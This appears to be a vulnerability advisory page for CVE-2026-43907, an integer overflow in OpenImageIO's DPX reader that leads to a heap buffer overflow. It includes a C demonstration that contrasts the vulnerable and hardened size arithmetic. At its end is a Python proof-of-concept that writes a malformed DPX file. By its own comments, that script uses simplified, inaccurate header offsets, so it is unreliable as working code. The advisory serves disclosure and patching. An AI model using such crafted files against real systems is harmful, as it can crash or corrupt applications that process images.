Security Vulnerability Report
CVE-2026-43907 CVSS 8.3 HIGH

Published: 2026-05-14 20:17:07
Last Modified: 2026-05-14 21:21:11

Description

OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to 3.0.18.0 and 3.1.13.0, a signed integer overflow in QueryRGBBufferSizeInternal() in DPXColorConverter.cpp leads to a heap-based out-of-bounds write when processing crafted DPX image files. The function computes buffer sizes using 32-bit signed integer arithmetic with negative multipliers (e.g., pixels * -3 * bytes for kCbYCr descriptors and pixels * -4 * bytes for kABGR descriptors), where a negative result is used as an in-band signal that no separate buffer is needed. When the pixel count is sufficiently large, the multiplication overflows INT_MIN and wraps to a small positive value. The caller in dpxinput.cpp interprets this positive value as a required buffer size, allocates an undersized heap buffer via m_decodebuf.resize(), and then writes the full image data into it via fread, resulting in a heap buffer overflow. An attacker can exploit this by crafting a DPX file that triggers the overflow, causing a denial of service (crash) or potentially arbitrary code execution through heap corruption in any application that reads pixel data using OpenImageIO. This vulnerability is fixed in 3.0.18.0 and 3.1.13.0.
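To make the arithmetic in the description concrete, here is an added example (not OpenImageIO's code) that emulates the vulnerable 32-bit signed size computation and its caller, beside a hardened form that returns the "no separate buffer" decision out of band, computes the size in 64 bits and rejects oversized results instead of wrapping. The descriptor enum, the function names, the per-descriptor channel counts and the MAX_DECODE_BYTES cap are assumptions, and the sample pixel count is constructed to wrap to exactly 4.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
/* Descriptor kinds named in the advisory; these enum names are assumed. */
enum { DESC_RGB, DESC_CBYCR, DESC_ABGR };
/* Vulnerable pattern: a negative result is the in-band "no separate buffer" signal and
 * the product is formed in 32-bit signed arithmetic. The wrap is emulated via uint32_t
 * so this function itself has no undefined behaviour. */
static int32_t vuln_query_size(int32_t pixels, int32_t bytes, int desc) {
    int32_t mult = (desc == DESC_CBYCR) ? -3 : (desc == DESC_ABGR) ? -4 : 3;
    int64_t exact = (int64_t)pixels * mult * bytes;  /* mathematically correct value */
    uint32_t low32 = (uint32_t)exact;                /* the 32 bits an int would keep */
    return (int32_t)low32;                           /* two's-complement reinterpretation */
}
/* Vulnerable caller pattern (as described for dpxinput.cpp): any positive result
 * becomes the resize() length, while fread() then writes the whole image. */
static bool vuln_caller_overflows(int32_t pixels, int32_t bytes, int desc) {
    int32_t size = vuln_query_size(pixels, bytes, desc);
    if (size <= 0) return false;                     /* "no buffer needed" path */
    int channels = (desc == DESC_ABGR) ? 4 : 3;      /* assumed channel counts */
    uint64_t written = (uint64_t)pixels * (uint64_t)bytes * (uint64_t)channels;
    return written > (uint64_t)size;                 /* true: heap buffer overflow */
}

/* Hardened pattern: the buffer decision is returned out of band, the size is
 * computed in 64 bits, and anything above a cap is rejected instead of wrapped. */
#define MAX_DECODE_BYTES ((uint64_t)1 << 31)         /* assumed cap; tune per deployment */
static bool safe_query_size(int32_t pixels, int32_t bytes, int desc,
                            bool *needs_buffer, size_t *out_size) {
    if (pixels <= 0 || bytes <= 0) return false;
    int channels = (desc == DESC_ABGR) ? 4 : 3;
    *needs_buffer = (desc != DESC_CBYCR && desc != DESC_ABGR);
    /* int32 * int32 * 4 stays below 2^64, so this product is exact. */
    uint64_t size = (uint64_t)pixels * (uint64_t)bytes * (uint64_t)channels;
    if (size > MAX_DECODE_BYTES) return false;
    *out_size = (size_t)size;
    return true;
}

int main(void) {
    /* Constructed input: 715827882 px * -3 * 2 bytes = -4294967292, whose low
     * 32 bits are 4, so the vulnerable caller would allocate only 4 bytes. */
    int32_t px = 715827882, bytes = 2;
    bool nb; size_t sz;
    printf("vulnerable: size=%d overflow=%d\n", vuln_query_size(px, bytes, DESC_CBYCR),
           vuln_caller_overflows(px, bytes, DESC_CBYCR));
    printf("hardened accepts=%d\n", safe_query_size(px, bytes, DESC_CBYCR, &nb, &sz));
    return 0;
}
```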

CVSS Details

CVSS Score: 8.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenImageIO < 3.0.18.0
OpenImageIO < 3.1.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC Concept for CVE-2026-43907
# This script generates a malformed DPX file with large dimensions to trigger the integer overflow.
import struct


def create_malformed_dpx(filename):
    # DPX file header magic
    magic = b'SDPX'
    offset_to_image = 2048

    # Construct a basic DPX header (simplified)
    # Setting width and height to a very large value to trigger the overflow
    # in pixels * -3 calculation within 32-bit signed integer range.
    width = 0x70000000  # Large width to force integer overflow
    height = 1

    header = bytearray(offset_to_image)
    header[0:4] = magic
    # Image offset (little-endian)
    header[4:8] = struct.pack('<I', offset_to_image)

    # Width and Height are at specific offsets in DPX header
    # Offset 768: Image Orientation (unsigned int)
    # Offset 770: Number of elements (unsigned int)
    # Offset 780: Width per element (unsigned int) - Simplified placement for PoC
    # Note: Actual DPX structure is more complex, this targets the logic vulnerability.
    # Writing width and height into generic positions for conceptual PoC
    # In a real exploit, precise header offsets must be matched.
    header[16:20] = struct.pack('<I', width)
    header[20:24] = struct.pack('<I', height)

    with open(filename, 'wb') as f:
        f.write(header)
        # Write minimal dummy data to simulate file content
        f.write(b'A' * 100)

    print(f'Malformed DPX file created: {filename}')


if __name__ == '__main__':
    create_malformed_dpx('exploit.dpx')
```

Weaknesses

CWE-190 (Integer Overflow or Wraparound)
CWE-787 (Out-of-bounds Write)

References

https://github.com/AcademySoftwareFoundation/OpenImageIO/security/advisories/GHSA-cq46-hp4h-cvfr (GitHub Security Advisory)
